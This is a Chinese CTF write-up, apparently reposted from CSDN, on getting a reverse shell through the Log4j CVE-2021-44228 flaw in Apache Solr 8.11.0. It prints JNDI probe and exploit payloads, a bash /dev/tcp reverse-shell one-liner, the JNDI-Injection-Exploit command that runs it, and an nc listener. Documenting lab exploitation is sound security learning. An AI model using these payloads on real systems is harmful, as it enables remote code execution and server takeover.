码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Log4j漏洞反弹shell CVE-2021-44228 Apache Log4j 远程代码执行漏洞复现


    文章目录

      • 前言
      • 工具
      • Log4j 漏洞测试
      • Log4j 反弹shell
      • 后记

    前言

    比赛出了一个题目,发现有log4j漏洞但是需要反弹shell才能拿到flag,一开始试了几个工具都没有成功反弹shell,直到看到了这篇优秀博文,在此感谢这位师傅~
    本文记录一下log4j反弹shell的这个过程,仅供各位师傅参考~

    去更远的地方 见更亮的光

    工具

    测试了部分工具发现这个比较好用一点,可以直接github下载也可以到我的网盘上下载
    girhub:JNDI-Injection-Exploit-1.0-SNAPSHOT-all
    网盘链接:https://pan.baidu.com/s/13cz9sZzMJcF9s1y7E7sOWw
    提取码:qwer

    Log4j 漏洞测试

    题目给了一个solr环境,通过首页可以看到版本为8.11.0
    在这里插入图片描述
    在DNSLog上获取一个域名
    在这里插入图片描述
    通过solr的API测试log4j漏洞是否存在,具体的payload如下:

    /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.jprd1u.dnslog.cn}
    
    • 1

    在这里插入图片描述
    在DNSlog平台上成功回显
    在这里插入图片描述
    至此可以推测目标环境存在log4j漏洞

    Log4j 反弹shell

    接下来就需要用到上面的工具和一台公网服务器了,首先把工具上传,将反弹shell的命令进行base64编码:

    bash -i >& /dev/tcp/your_ip/6666 0>&1
    
    • 1

    用base64在线网站进行编码后填入下面的命令中,同时需要填入服务器的IP地址

    执行如下命令:

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64编码}|{base64,-d}|{bash,-i}" -A "服务器IP"
    
    • 1

    在这里插入图片描述

    接下来在服务器上开启监听,我这里用的是5555端口

    nc -lvp 5555
    
    • 1

    根据目标环境选择payload如下:

    ${jndi:ldap://IP:1389/2u3m9p}
    
    • 1

    用payload进行测试
    在这里插入图片描述

    成功反弹shell
    在这里插入图片描述

    后记

    如有其他疑问欢迎评论留言~

  • 相关阅读:
    Arduino驱动LM35线性温度传感器(温湿度传感器)
    Google Earth Engine(GEE)——GEE错误结果没有变化?
    【STC32G12K128开发板】——搭建开发环境
    什么是Jmeter?Jmeter使用的原理步骤是什么?
    中断实验(按键/光电开关/火焰传感器/人体红外)
    SpringMvc决战-【SpringMVC之自定义注解】
    APISIX安装与灰度、蓝绿发布
    软件和硬件中的调用
    QT中QThread的各个方法,UI线程关系,事件关系详解(3)
    [Java]_[初级]_[使用fastjson以流的方式读取json大文件]
  • 原文地址:https://blog.csdn.net/monster663/article/details/126806732
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号